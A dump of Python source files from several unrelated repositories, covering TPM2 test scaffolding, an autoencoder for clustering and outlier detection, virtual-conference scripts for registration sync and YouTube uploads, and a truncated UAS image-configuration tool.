"source": "joholl/tpm2-pytss",
"score": 2
} |
#### File: tpm2_pytss/util/testing.py
```python
import os
import time
import tempfile
import unittest
import contextlib
from .. import tcti
from ..esys import ESYS
from ..fapi import FAPI, FAPIDefaultConfig
from ..exceptions import TPM2Error
from .simulator import SimulatorTest
from .retry import TCTI_RETRY_TRIES
ENV_TCTI = "PYESYS_TCTI"
ENV_TCTI_DEFAULT = "mssim"
ENV_TCTI_CONFIG = "PYESYS_TCTI_CONFIG"
ENV_TCTI_CONFIG_DEFAULT = None
class BaseTestESYS(SimulatorTest, unittest.TestCase):
"""
ESYS tests should subclass from this
"""
def setUp(self):
super().setUp()
self.esys = ESYS()
self.tcti = tcti.TCTI.load(os.getenv(ENV_TCTI, default=ENV_TCTI_DEFAULT))
self.tcti_config = os.getenv(
ENV_TCTI_CONFIG, default="port=%d" % (self.simulator.port)
)
# Create a context stack
self.ctx_stack = contextlib.ExitStack().__enter__()
# Enter the contexts
self.tcti_ctx = self.ctx_stack.enter_context(
self.tcti(config=self.tcti_config, retry=TCTI_RETRY_TRIES)
)
self.esys_ctx = self.ctx_stack.enter_context(self.esys(self.tcti_ctx))
# Call Startup and clear the TPM
self.esys_ctx.Startup(self.esys_ctx.TPM2_SU_CLEAR)
# Set the timeout to blocking
self.esys_ctx.SetTimeout(self.esys_ctx.TSS2_TCTI_TIMEOUT_BLOCK)
def tearDown(self):
super().tearDown()
self.ctx_stack.__exit__(None, None, None)
class BaseTestFAPI(SimulatorTest, unittest.TestCase):
"""
FAPI tests should subclass from this
"""
def setUp(self):
super().setUp()
# Create a context stack
self.ctx_stack = contextlib.ExitStack().__enter__()
# Create temporary directories
self.user_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())
self.log_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())
self.system_dir = self.ctx_stack.enter_context(tempfile.TemporaryDirectory())
# Create the FAPI object
self.fapi = FAPI(
FAPIDefaultConfig._replace(
user_dir=self.user_dir,
system_dir=self.system_dir,
log_dir=self.log_dir,
tcti="mssim:port=%d" % (self.simulator.port,),
tcti_retry=TCTI_RETRY_TRIES,
ek_cert_less=1,
)
)
# Enter the context
self.fapi_ctx = self.ctx_stack.enter_context(self.fapi)
def tearDown(self):
super().tearDown()
self.ctx_stack.__exit__(None, None, None)
``` |
{
"source": "johpetsc/autoencoder-clustering",
"score": 3
} |
#### File: autoencoder-clustering/src/autoencoder.py
```python
import pandas as pd
from datetime import datetime
import tensorflow as tf
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
SEQLEN = 25
EMBEDDING_SIZE = 25
def generate_data():
data = pd.read_excel('../dataset/minioutput.xlsx')
data = data.sample(frac = 1, random_state=7).reset_index(drop=True)
data.drop('Unnamed: 0', axis=1, inplace=True)
final = data.copy()
data.drop('Original', axis=1, inplace=True)
data.drop('Cluster', axis=1, inplace=True)
return data, final
def generate_input(data):
text_input = data.pop('Text')
tokenizer = tf.keras.preprocessing.text.Tokenizer(
filters='',
lower=True, split=' ')
tokenizer.fit_on_texts(text_input)
x = tokenizer.texts_to_sequences(text_input)
res = tf.keras.preprocessing.sequence.pad_sequences(x, maxlen=25,
padding='post')
vocab_size = len(tokenizer.word_index)
standard_scaler = StandardScaler()
data_standard = standard_scaler.fit_transform(data)
final_data = {'data_input': data_standard, 'text_input': res}
final_data_out = {'decoded_data': data_standard, 'decoded_txt': res}
return final_data, final_data_out, vocab_size
def plot_graphs(history, metric):
plt.plot(history.history[metric])
plt.plot(history.history['val_'+metric], '')
plt.xlabel("Epochs")
plt.ylabel(metric)
plt.legend([metric, 'val_'+metric])
plot_name = '../results/' + metric + '.svg'
#plt.savefig(plot_name)
plt.show()
def autoencoder(final_data, final_data_out, vocab_size):
len_data = final_data["data_input"].shape[1]
data_input = tf.keras.layers.Input(shape=(len_data, ), name='data_input')
text_input = tf.keras.layers.Input(shape=(SEQLEN,), name='text_input')
x = tf.keras.layers.Embedding(vocab_size + 1, EMBEDDING_SIZE,
input_length=SEQLEN)(text_input)
text_output = tf.keras.layers.LSTM(SEQLEN, activation='relu')(x)
concat_inputs = tf.keras.layers.concatenate([data_input, text_output])
encoded = tf.keras.layers.Dense(16, activation='relu')(concat_inputs)
# encoded = tf.keras.layers.Dropout(0.2)(encoded)
encoded = tf.keras.layers.Dense(8, activation='relu')(encoded)
# encoded = tf.keras.layers.Dropout(0.2)(encoded)
encoded = tf.keras.layers.Dense(4, activation='relu')(encoded)
decoded = tf.keras.layers.Dense(4, activation='relu')(encoded)
# decoded = tf.keras.layers.Dropout(0.2)(decoded)
decoded = tf.keras.layers.Dense(8, activation='relu')(decoded)
# decoded = tf.keras.layers.Dropout(0.2)(decoded)
decoded = tf.keras.layers.Dense(16, activation='relu')(decoded)
decoded_data = tf.keras.layers.Dense(len_data, name='decoded_data')(decoded)
decoded_text = tf.keras.layers.Dense(SEQLEN, name='decoded_txt')(decoded)
decoded = [decoded_data, decoded_text]
ae_input_layers = {'data_input': data_input,
'text_input': text_input}
ae_output_layers = {'decoded_data': decoded[0],
'decoded_txt': decoded[1]}
autoencoder = tf.keras.Model(ae_input_layers, ae_output_layers)
autoencoder.compile(optimizer=tf.keras.optimizers.Adam(0.001),
loss='mse',
metrics=['mse', 'mae'])
print(autoencoder.summary())
history = autoencoder.fit(final_data, final_data_out,
epochs=100,
validation_split=0.2
)
predicted = autoencoder.predict(final_data)
metrics = ['loss', 'decoded_data_loss', 'decoded_txt_loss', 'decoded_data_mse', 'decoded_data_mae', 'decoded_txt_mse', 'decoded_txt_mae']
for metric in metrics:
plot_graphs(history, metric)
return predicted
def outliers(final, predicted):
final['decoded_txt'] = predicted['decoded_txt'].std(axis=1).tolist()
final['raw'] = predicted['decoded_txt'].tolist()
final['decoded_data'] = predicted['decoded_data'].mean(axis=1).tolist()
final = final.sort_values(by=['decoded_txt', 'decoded_data']).reset_index(drop=True)
def main():
data, final = generate_data()
final_data, final_data_out, vocab_size = generate_input(data)
predicted = autoencoder(final_data, final_data_out, vocab_size)
outliers(final, predicted)
if __name__ == '__main__':
main()
```
#### File: autoencoder-clustering/src/outliers.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.spatial.distance import cdist
pd.options.mode.chained_assignment = None
def plot_outliers(outliers, inliers, center, df):
plt.scatter(inliers['Quantity'] , inliers['Price'], label='Inliers')
plt.scatter(outliers['Quantity'] , outliers['Price'], s=60, color='red', marker='x', label='Outliers')
plt.scatter(center[:,0] , center[:,1] , s = 80, color='black', marker='^', label='Center')
plt.ylabel('Price', fontsize=10)
plt.xlabel('Quantity', fontsize=10)
plt.title('Cluster ' + str(df['Cluster'].iloc[0]))
plt.ylim(ymin=0)
plt.xlim(xmin=0)
plt.legend(loc="upper right")
plt.show()
def limit_outliers(df):
Q1, Q3 = np.percentile(df['Quantity'], [20, 80])
IQR = Q3 - Q1
x_upper_limit = Q3 + 1.5 * IQR
x_lower_limit = Q1 - 1.5 * IQR
Q1, Q3 = np.percentile(df['Price'], [25, 75])
IQR = Q3 - Q1
y_upper_limit = Q3 + 1.5 * IQR
y_lower_limit = Q1 - 1.5 * IQR
x_axis = df['Quantity'].mean()
y_axis = df['Price'].mean()
x_threshold = max(1,5 * x_axis, x_upper_limit)
y_threshold = max(1,5 * y_axis, y_upper_limit)
center = np.array([x_axis, y_axis]).reshape(1, -1)
df.loc[(df['Quantity'] > x_threshold), 'Outlier'] = 1
df.loc[(df['Price'] > y_threshold), 'Outlier'] = 1
#plot_outliers(df.loc[df['Outlier'] == 1], df.loc[df['Outlier'] == 0], center, df)
#print(df)
return df
def distance_outliers(df):
x_axis = df['Quantity'].mean()
y_axis = df['Price'].mean()
center = np.array([x_axis, y_axis]).reshape(1, -1)
distances = cdist(center, df[['Quantity', 'Price']], 'seuclidean')
df['Distance'] = np.transpose(distances)
outliers = df[df['Distance'] >= np.percentile(df['Distance'], 95)]
df.loc[df['Distance'] >= np.percentile(df['Distance'], 95), 'Outlier'] = 1
inliers = df[df['Distance'] < np.percentile(df['Distance'], 95)]
print(outliers)
df = df.drop(columns='Distance')
plot_outliers(outliers, inliers, center, df)
return df
def main():
data = pd.read_excel('../dataset/output.xlsx')
data['Outlier'] = 0
for x in range (0, 2400):
cluster = data[(data['Cluster'] == x)]
print("Cluster: ", x)
if(cluster.shape[0] > 1):
df = limit_outliers(cluster)
data[data['Cluster'] == x] = df
elif(cluster.shape[0] == 1):
cluster['Outlier'] = 1
data[data['Cluster'] == x] = cluster
data.to_excel("../dataset/outliers.xlsx", index=False)
if __name__ == '__main__':
main()
``` |
{
"source": "johpro/virtual-conference",
"score": 4
} |
#### File: virtual-conference/core/papers_db.py
```python
from typing import List
import csv
import os
import json
import uuid
class PapersDatabase:
"""
Read the stored metadata of papers/sessions from a specified CSV file that was exported from the Google Sheets workbook, for instance.
"""
def __init__(self, csv_file : str):
""" Load and parse the specified csv file. First row must contain headers.
"""
self.csv_file = csv_file
data : List[dict] = []
self.data = data
self.data_by_uid : dict = {}
if not os.path.isfile(csv_file):
raise RuntimeError(f"Could not find the specified csv_file '{csv_file}'")
with open(csv_file, 'r') as f:
reader = csv.DictReader(f)
self.fieldnames = reader.fieldnames
for row in reader:
uid :str = row['UID']
if not uid:
raise RuntimeError(f"each entry in db needs to provide UID")
if uid in self.data_by_uid:
raise RuntimeError(f"each entry in db needs a *unique* UID, '{uid}' appears at least twice")
data.append(row)
self.data_by_uid[uid] = row
def save(self, target_fn : str = None):
"""Saves paper db to .csv file. Overwrites existing db file if no other target filename is specified.
"""
if not target_fn:
target_fn = self.csv_file
temp_fn = target_fn + str(uuid.uuid4())
with open(temp_fn, 'w', newline='') as f:
writer = csv.DictWriter(f, self.fieldnames)
writer.writeheader()
writer.writerows(self.data)
os.replace(temp_fn, target_fn)
```
#### File: johpro/virtual-conference/populate_paper_pdf_info.py
```python
import sys
import pprint
import re
import os
import core.schedule as schedule
nonalphanumeric = re.compile("[^A-Za-z0-9]")
def make_normalized_title(title):
if not title:
return ""
norm = nonalphanumeric.sub("", title)
norm = norm.lower()
if len(norm) > 64:
return norm[0:64]
return norm
USAGE = """
./populate_paper_info.py <schedule_db.xlsx> <PDF root dir>
"""
if len(sys.argv) != 3:
print(USAGE)
sys.exit(1)
schedule_db = schedule.Database(sys.argv[1])
pdf_root_path = os.path.normpath(sys.argv[2])
pdf_files = {}
# Collect all the videos, subtitle, image and image caption info for this event indexed by UID
print(f"Collecting all PDFs under {pdf_root_path}")
for path, dirs, files in os.walk(pdf_root_path):
for f in files:
basename = os.path.basename(f)
title, ext = os.path.splitext(basename)
if ext != ".pdf":
continue
filename = os.path.join(path, f)
relpath = os.path.relpath(filename, start=pdf_root_path)
pdf_files[make_normalized_title(title)] = {
"path": "papers/" + relpath,
"used": False
}
# Iterate through the schedule and match up each PDF with its paper
days = ["sunday", "monday", "tuesday", "wednesday", "thursday", "friday"]
for d in days:
day_info = schedule_db.get_day(d)
sessions = day_info.get_sessions(False)
for k, v in sessions.items():
for i in range(v.num_timeslots()):
uid = v.timeslot_entry(i, "UID").value
if not uid:
continue
title = v.timeslot_entry(i, 'Time Slot Title').value
normtitle = make_normalized_title(title)
if normtitle in pdf_files:
pdf_file = pdf_files[normtitle]["path"]
#print(f"Matched {title} to {pdf_file}")
v.timeslot_entry(i, "PDF File").value = pdf_file
pdf_files[normtitle]["used"] = True
schedule_db.save("populate_pdf_info_out.xlsx")
# Make sure we matched up all the videos we found
for k, v in pdf_files.items():
if not v["used"]:
fname = v["path"]
print(f"ERROR: PDF {fname} was not used! Slug {k}")
pprint.pprint(v)
```
#### File: johpro/virtual-conference/sync_eventbrite_to_auth0.py
```python
import argparse
import sys
import time
import os
import json
import os.path as path
import bcrypt # bcrypt
import string
import secrets
import time
import http.client
import requests
from urllib.parse import urlsplit
from datetime import datetime
from email.mime.image import MIMEImage
import core.auth as auth
import core.schedule as schedule
alphabet = string.ascii_letters + string.digits
def load_logo_attachment(filename):
with open(filename, "rb") as f:
attachment = MIMEImage(f.read())
attachment.add_header("Content-Disposition", "inline", filename=filename)
attachment.add_header("Content-ID", "<logo_image>")
return attachment
def load_already_registered():
res = {}
if path.exists("registered.json"):
with open("registered.json", "r") as f:
res = json.load(f)
return res
def format_to_auth0(email, name, password, password_hash):
return {
"email": email,
"email_verified": True,
"name": name,
"password_hash": <PASSWORD>('utf-8'),
}
def send_to_auth0(session, filename, access_token, connection_id):
payload = {
"connection_id": connection_id,
"external_id": "import_user",
"send_completion_email": False
}
files = {
"users": open(filename, "rb")
}
headers = {
'authorization': f"Bearer {access_token}"
}
domain = "https://" + urlsplit(session.auth0["audience"]).netloc + "/api/v2/jobs/users-imports"
response = requests.post(domain, data=payload, files=files,
headers=headers)
print(response.content)
def send_register_email(email, session, logo_attachment, name, password):
discord_invite = ""
if not "SUPERMINISTREAM_DISCORD_INVITE" in os.environ:
print("WARNING: You must provide the discord_invite url in $SUPERMINISTREAM_DISCORD_INVITE")
else:
discord_invite = os.environ["SUPERMINISTREAM_DISCORD_INVITE"]
# Send them an email with the account name and password
email_html = f"""
<p>Dear {name},</p>
<p>Thank you for registering for VIS2021! We have a great week scheduled of paper
presentations, workshops, tutorials, panels, and more!
This email contains your login information for the virtual conference website:
<a href="https://virtual.ieeevis.org/">https://virtual.ieeevis.org/</a>.
The website contains the conference schedule, the virtual conference rooms
where you can watch the presentations, Discord chat channels for each session,
and links to download
the papers. Try shuffling the
<a href="https://virtual.ieeevis.org/papers.html">paper browser</a> by serendipity to find
something totally new!
</p>
<ul>
<li><b>User name:</b> {email}</li>
<li><b>Password:</b> {password}</li>
<li><b>Discord Invite: {discord_invite}</b> </li>
</ul>
<img width='400' src='cid:logo_image' alt='Logo'/>
"""
plain_text = f"""
Dear {name},
Thank you for registering for VIS2021! We have a great week scheduled of paper
presentations, workshops, tutorials, panels, and more!
This email contains your login information for the virtual conference website:
https://virtual.ieeevis.org/.
The website contains the conference schedule, the virtual conference rooms where
you can watch the presentations,
Discord chat channels for each session, and links to download
the papers. Try shuffling the paper browser
https://virtual.ieeevis.org/papers.html by serendipity to find
something totally new!
User name: {email}
Password: {password}
Discord Invite: {discord_invite}
"""
attachments = None
if logo_attachment:
attachments = [logo_attachment]
schedule.send_html_email("VIS 2021 Registration",
email_html,
email,
session.email,
alternative_text=plain_text,
attachments=attachments)
def get_any_password_requests():
password_requests = []
for f in os.listdir("./"):
if f.startswith("password_request"):
with open(f, "r") as fhandle:
for l in fhandle.readlines():
line = l.strip()
if len(line) > 0:
password_requests.append(line)
print(f"Got password requests {password_requests}")
return password_requests
def get_new_eventbrite(session):
eventbrite_event_id = session.eventbrite_event_id
# Get the resource URI for the attendee page since we have to do the paginated
# requests ourselves
attendees = session.eventbrite.get_event_attendees(eventbrite_event_id)
last_page = attendees["pagination"]["page_count"]
# Note: Eventbrite's python SDK is half written essentially, and
# doesn't directly support paging properly. So to load the other
# pages we need to use the raw get call ourselves instead of
# being able to continue calling get_event_attendees
# It looks like we can also directly request a page by passing page: <number>
eventbrite_registrations = []
# Page indices start at 1 inclusive
for i in range(1, last_page + 1):
print(f"Fetching eventbrite registrations page {i} of {last_page}")
args = {
'page': i
}
attendees = session.eventbrite.get(attendees.resource_uri, args)
if not "attendees" in attendees:
print("Error fetching eventbrite response?")
print(attendees)
break
for a in attendees["attendees"]:
eventbrite_registrations.append((
a["profile"]["name"],
a["profile"]["email"]
))
return eventbrite_registrations
def get_all(transmit_to_auth0, session, logo_attachment, max_new=-1):
results = get_new_eventbrite(session)
password_requests = get_any_password_requests()
all_registered = load_already_registered()
all_new = []
for email, x in all_registered.items():
if "emailed" not in x:
x["emailed"] = False
if not x["emailed"]:
results.append([x["name"], x["email"]])
now = str(datetime.utcnow())
for x in results:
name, email = x
if max_new > 0 and len(all_new) >= max_new:
break
if len(email) == 0:
continue
# We use this same process to re-send someone their login info, so they could be
# already registered
if email not in all_registered or not all_registered[email]["emailed"]:
print(f"adding {email}")
# random password
password = ""
if email not in all_registered:
password = ''.join(secrets.choice(alphabet) for i in range(10)).encode("utf-8")
else:
password = all_registered[email]["password"].encode("utf-8")
salt = bcrypt.gensalt(rounds=10)
password_hash = <PASSWORD>.hashpw(password, salt)
all_new.append(format_to_auth0(email, name, password, password_hash))
all_registered[email] = {"name": name,
"email": email,
"password": <PASSWORD>('<PASSWORD>'),
"date": now,
"emailed": False}
elif email in password_requests:
print(f"Password request for {email}")
else:
continue
password = all_registered[email]["password"]
if session.email:
time.sleep(0.1)
try:
if session.email:
send_register_email(email, session, logo_attachment, name, password)
all_registered[email]["emailed"] = True
except Exception as e:
print("Error sending email {}".format(e))
print(f"Got {len(all_new)} new registrations")
registration_stats = {}
registration_stats_file = "registration_stats.json"
if os.path.isfile(registration_stats_file):
with open("registration_stats.json", "r") as f:
registration_stats = json.load(f)
registration_stats["new_since_last"] += len(all_new)
else:
registration_stats["new_since_last"] = len(all_new)
print(registration_stats)
with open(registration_stats_file, "w") as f:
json.dump(registration_stats, f)
if len(all_new) > 0:
file_name = f"new_imports_{time.time_ns() / 1000}.json"
with open(file_name, "w") as f:
json.dump(all_new, f)
if transmit_to_auth0:
print("Sending to Auth0")
token = session.get_auth0_token()
send_to_auth0(session, file_name, token, session.auth0["connection_id"])
with open("registered.json", "w") as f:
json.dump(all_registered, f, indent=4)
print(f"New registrations processed at {datetime.now()}")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--mail', action="store_true", help='send email for new users')
parser.add_argument('--auth0', action="store_true", help='send new users to auh0')
parser.add_argument('--limit', default=-1, type=int, help='maximum number of new users for this run')
parser.add_argument("--logo", default=None, type=str, help='path to vis 2021 logo')
args = parser.parse_args()
session = auth.Authentication(email=args.mail, eventbrite_api=True, auth0_api=True)
logo_attachment = None
if args.logo:
logo_attachment = load_logo_attachment(args.logo)
while True:
print("Checking for new registrations")
get_all(args.auth0, session, logo_attachment, args.limit)
time.sleep(15 * 60)
```
#### File: johpro/virtual-conference/upload_yt_videos.py
```python
import sys
import os
import http.client
import httplib2
import time
from docopt import docopt
from apiclient.http import MediaFileUpload
from apiclient.errors import HttpError
import core.schedule as schedule
import core.auth as conf_auth
import core.excel_db as excel_db
USAGE = """
Upload the Videos to YouTube
Usage:
upload_yt_videos.py <video_list.xlsx> <video_root_path> [--no-update]
"""
arguments = docopt(USAGE)
sheet_name = "friday"
title_field = "Time Slot Title"
authors_field = "Authors"
description_field = "Abstract"
video_file_field = "Video File"
subtitles_file_field = "Subtitles File"
playlist_prefix_field = "Event"
playlist_field = "Session"
out_youtube_video_field = "Youtube Video"
out_youtube_playlist_field = "Youtube Playlist"
infile = arguments["<video_list.xlsx>"]
outfile = os.path.splitext(infile)[0] + "_uploaded.xlsx"
video_db = excel_db.open(infile)
video_table = video_db.get_table(sheet_name)
video_root_path = arguments["<video_root_path>"]
update_descriptions = not arguments["--no-update"]
RETRIABLE_STATUS_CODES = [500, 502, 503, 504]
RETRIABLE_EXCEPTIONS = (httplib2.HttpLib2Error, IOError, http.client.NotConnected,
http.client.IncompleteRead, http.client.ImproperConnectionState,
http.client.CannotSendRequest, http.client.CannotSendHeader,
http.client.ResponseNotReady, http.client.BadStatusLine)
def upload_video(video, title, description, auth):
upload_request = auth.youtube.videos().insert(
part="id,status,snippet",
body = {
"snippet": {
"title": title,
"description": description,
"categoryId": 27 # Category 27 is "education"
},
"status": {
"privacyStatus": "unlisted",
"selfDeclaredMadeForKids": False,
"embeddable": True
}
},
media_body=MediaFileUpload(video, chunksize=-1, resumable=True)
)
httplib2.RETRIES = 1
response = None
error = None
retries = 0
while not response:
try:
print(f"Uploading Video:\ntitle = {title}\nauthors = {authors}\nvideo = {video}")
status, response = upload_request.next_chunk()
if response:
if "id" in response:
print(f"Uploaded\ntitle = {title}\nauthors = {authors}\nvideo = {video}")
return response
else:
print("Upload failed with an unexpected response")
return None
except HttpError as e:
if e.resp.status in RETRIABLE_STATUS_CODES:
error = f"Retriable HTTP error {e.resp.status}: {e.content}"
else:
raise e
except RETRIABLE_EXCEPTIONS as e:
error = f"A retriable exception occured {e}"
if error:
print(error)
retries += 1
if retries > 10:
print("Reached max retries, aborting")
break
time.sleep(1)
return None
def update_video(video_id, title, description, auth):
print("Updating\ntitle = {}\nauthors = {}\nvideo = {}".format(title, authors, video_id))
upload_response = auth.youtube.videos().update(
part="id,snippet,status",
body = {
"id": video_id,
"snippet": {
"title": title,
"description": description,
"categoryId": 27 # Category 27 is "education"
}
}
).execute()
return upload_response
def get_all_playlists(auth):
all_playlists = []
page_token = None
while True:
playlists = auth.youtube.playlists().list(
part="snippet,contentDetails",
maxResults=50,
mine=True,
pageToken=page_token
).execute()
all_playlists += playlists["items"]
if "nextPageToken" not in playlists:
break
page_token = playlists["nextPageToken"]
return all_playlists
def get_playlist_items(auth, playlist_id):
all_items = []
page_token = None
while True:
items = auth.youtube.playlistItems().list(
part="id,snippet,status",
maxResults=50,
playlistId=playlist_id,
pageToken=page_token
).execute()
all_items += items["items"]
if "nextPageToken" not in items:
break
page_token = items["nextPageToken"]
return all_items
if not out_youtube_video_field in video_table.index or not out_youtube_playlist_field in video_table.index:
index = [None] * len(video_table.index)
for k, v in video_table.index.items():
index[v - 1] = k
if not out_youtube_video_field in video_table.index:
index.append(out_youtube_video_field)
if not out_youtube_playlist_field in video_table.index:
index.append(out_youtube_playlist_field)
video_table.set_index(index)
# Validate the input sheet
to_upload = []
total_bytes = 0
all_files_found = True
for r in range(2, video_table.table.max_row + 1):
video_info = video_table.row(r)
# If there's no video, or it was already uploaded, skip verifying the file
# exists because we don't need it
if not video_info[video_file_field].value or video_info[out_youtube_video_field].value:
continue
video = os.path.join(video_root_path, video_info[video_file_field].value)
if not os.path.isfile(video):
all_files_found = False
print(f"Video '{video}' was not found")
else:
total_bytes += os.path.getsize(video)
to_upload.append(video)
subtitles = video_info[subtitles_file_field].value
if subtitles:
subtitles = os.path.join(video_root_path, video_info[subtitles_file_field].value)
if not os.path.isfile(subtitles):
all_files_found = False
print("Subtitles {} were not found".format(subtitles))
print(f"Will upload {len(to_upload)} videos")
print(f"Total data upload size: {total_bytes * 1e-6}MB")
for v in to_upload:
print(v)
if not all_files_found:
print(f"WARNING: Some files were not found.")
go = input("Proceed with upload? (y/n): ")
if go == "n":
sys.exit(0)
auth = conf_auth.Authentication(youtube=True, use_pickled_credentials=True)
playlists = {}
print("Getting playlists")
yt_playlists = get_all_playlists(auth)
current_playlists = {}
for pl in yt_playlists:
title = pl["snippet"]["title"]
current_playlists[title] = {
"id": pl["id"],
"videos": []
}
items = get_playlist_items(auth, pl["id"])
for i in items:
current_playlists[title]["videos"].append(i["snippet"]["resourceId"]["videoId"])
print("Starting upload")
videos_uploaded = 0
for r in range(2, video_table.table.max_row + 1):
video_info = video_table.row(r)
if not video_info[video_file_field].value:
continue
if videos_uploaded >= 85:
print("Stopping after uploading 85 videos, approaching upload limit")
break
print(f"{video_info[video_file_field].value}")
title = schedule.make_youtube_title(video_info[title_field].value)
description = "Title: " + video_info[title_field].value
authors = None
if video_info[authors_field].value:
authors = video_info[authors_field].value.replace("|", ", ")
else:
authors = video_info["Contributor(s)"].value.replace("|", ", ")
description += "\nAuthors: " + authors
if video_info[description_field].value:
description += "\n" + video_info[description_field].value
# Make sure description text content is valid for Youtube
description = schedule.make_youtube_description(description)
# Upload the video
video_id = None
if not video_info[out_youtube_video_field].value:
video = os.path.join(video_root_path, video_info[video_file_field].value)
if not os.path.isfile(video):
print(f"Skipping uploading missing file {video}")
print("----")
continue
videos_uploaded += 1
try:
upload_response = upload_video(video, title, description, auth)
print(upload_response)
video_info[out_youtube_video_field].value = "https://youtu.be/" + upload_response["id"]
video_id = upload_response["id"]
except Exception as e:
print("Failed to upload {}: {}".format(video, e))
print("Stopping uploading")
break
subtitles = video_info[subtitles_file_field].value
# Upload the subtitles
if subtitles:
try:
subtitles = os.path.join(video_root_path, video_info[subtitles_file_field].value)
subtitles_response = auth.youtube.captions().insert(
part="id,snippet",
body={
"snippet": {
"videoId": upload_response["id"],
"language": "en-us",
"name": video_info[subtitles_file_field].value
}
},
media_body=MediaFileUpload(subtitles)
).execute()
print(subtitles_response)
except Exception as e:
print("Failed to upload {}: {}".format(subtitles, e))
else:
video_id = schedule.match_youtube_id(video_info[out_youtube_video_field].value)
if update_descriptions:
update_response = update_video(video_id, title, description, auth)
print(update_response)
if video_id:
if video_info[playlist_field].value and not video_info[out_youtube_playlist_field].value:
playlist_title = video_info[playlist_prefix_field].value + " - " + str(video_info[playlist_field].value)
if playlist_title[0:4] == "VIS ":
playlist_title = "VIS21" + playlist_title[3:]
playlist_title = schedule.make_youtube_title(playlist_title)
if not playlist_title in playlists:
playlists[playlist_title] = []
if not video_id in playlists[playlist_title]:
playlists[playlist_title].append(video_id)
else:
print("Video already in playlist")
else:
print("Video {} was not uploaded".format(title))
video_db.save(outfile)
print("----")
video_db.save(outfile)
# Create new playlists we need and add videos to the playlists
print(playlists)
for pl, videos in playlists.items():
# Create new playlists if needed
if pl not in current_playlists:
resp = auth.youtube.playlists().insert(
part="id,status,snippet",
body={
"snippet": {
"title": pl
},
"status": {
"privacyStatus": "unlisted"
}
}).execute()
current_playlists[pl] = {
"id": resp["id"],
"videos": []
}
for v in videos:
if v not in current_playlists[pl]["videos"]:
resp = auth.youtube.playlistItems().insert(
part="id,status,snippet",
body={
"snippet": {
"playlistId": current_playlists[pl]["id"],
"resourceId": {
"kind": "youtube#video",
"videoId": v
}
}
}).execute()
r = video_table.find(out_youtube_video_field, "https://youtu.be/" + v)
video_table.entry(r[0], out_youtube_playlist_field).value = "https://www.youtube.com/playlist?list={}".format(current_playlists[pl]["id"])
video_db.save(outfile)
video_db.save(outfile)
``` |
{
"source": "johren-hpe/uai-images",
"score": 2
} |
#### File: uai-images/update-uas/noxfile.py
```python
from __future__ import absolute_import
import os
import nox # pylint: disable=import-error
COVERAGE_FAIL = 98
PYTHON = False if os.getenv("NOX_DOCKER_BUILD") else ['3']
@nox.session(python=PYTHON)
def lint(session):
"""Run linters.
Returns a failure if the linters find linting errors or sufficiently
serious code quality issues.
"""
run_cmd = ['pylint', 'src']
if 'prod' not in session.posargs:
run_cmd.append('--enable=fixme')
if session.python:
session.install('-r', 'requirements-lint.txt')
session.run(*run_cmd)
@nox.session(python=PYTHON)
def style(session):
"""Run code style checker.
Returns a failure if the style checker fails.
"""
run_cmd = ['pycodestyle',
'--config=.pycodestyle',
'src']
if 'prod' not in session.posargs:
# ignore improper import placement, specifically in
# gen_swagger.py as we have code in there that is needed to
# prepare for importing tms_app. Also, ignore warnings about
# line breaks after binary operators, since there are
# instances where readability is enhanced by line breaks like
# that.
run_cmd.append('--ignore=E402,W504')
if session.python:
session.install('-r', 'requirements-style.txt')
session.run(*run_cmd)
@nox.session(python=PYTHON)
def tests(session):
"""Default unit test session.
"""
# Install all test dependencies, then install this package in-place.
path = 'src'
if session.python:
session.install('-r', 'requirements-test.txt')
session.install('-r', 'requirements.txt')
# Run py.test against the tests.
session.run(
'py.test',
'--quiet',
'-W',
'ignore::DeprecationWarning',
'--cov=src',
'--cov-append',
'--cov-config=.coveragerc',
'--cov-report=',
'--cov-fail-under={}'.format(COVERAGE_FAIL),
os.path.join(path),
)
@nox.session(python=PYTHON)
def cover(session):
"""Run the final coverage report.
This outputs the coverage report aggregating coverage from the unit
test runs, and then erases coverage data.
"""
if session.python:
session.install('coverage', 'pytest-cov')
session.run('coverage', 'report', '--show-missing',
'--fail-under={}'.format(COVERAGE_FAIL))
session.run('coverage', 'erase')
```
#### File: update-uas/src/update_uas.py
```python
import sys
from getopt import getopt, GetoptError
from requests.exceptions import RequestException
import requests
IMAGES_URI = "http://cray-uas-mgr:8088/v1/admin/config/images"
VOLUMES_URI = "http://cray-uas-mgr:8088/v1/admin/config/volumes"
CLASSES_URI = "http://cray-uas-mgr:8088/v1/admin/config/classes"
HEADERS = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
SIMPLE_UAI_CLASS_COMMENT = (
"HPE Provided Simple UAI Class -- Please Do Not Delete or Modify"
)
class UASError(Exception): # pylint: disable=too-few-public-methods
""" Exception to report various errors talking to the UAS
"""
class UsageError(Exception): # pylint: disable=too-few-public-methods
""" Exception to report usage problems in parameter processing
"""
class ContextualError(Exception): # pylint: disable=too-few-public-methods
""" Exception to report failures seen and contextualized in the main
function.
"""
def get_registered_images():
"""Get the current set of registered UAI images from the
UAS.
"""
response = requests.get(IMAGES_URI, headers=HEADERS,
verify=True, timeout=15.0)
if response.status_code != requests.codes['ok']:
raise UASError(
"failed to retrieve configured images from UAS - %s[%d]" %
(response.text, response.status_code)
)
return response.json()
def get_volume_ids(volumenames):
"""Get the list of volume_ids for the specified list of volume names
(if they are configured) in the UAS configuration. If a volume
name is not configured, there is no corresponding volume_id so
ignore it.
"""
response = requests.get(VOLUMES_URI, headers=HEADERS,
verify=True, timeout=15.0)
if response.status_code != requests.codes['ok']:
raise UASError(
"failed to retrieve configured volumes from UAS - %s[%d]" %
(response.text, response.status_code)
)
# On successm the above returns a list of volumes, each with a
# 'volumename' and a 'volume_id'. We want the volume_ids of the
# ones that are in the basic_volumnames list.
volumes = response.json()
return [
volume['volume_id']
for volume in volumes
if volume['volumename'] in volumenames
]
def get_uai_classes():
"""Get the current set of UAI classes from the UAS.
"""
response = requests.get(CLASSES_URI, headers=HEADERS,
verify=True, timeout=15.0)
if response.status_code != requests.codes['ok']:
raise UASError(
"failed to retrieve configured UAI classes from UAS - %s[%d]" %
(response.text, response.status_code)
)
return response.json()
def find_default_image(images):
"""Search the list of registered images for a defult image, if any. Return
the image if found, otherwise None
"""
for img in images:
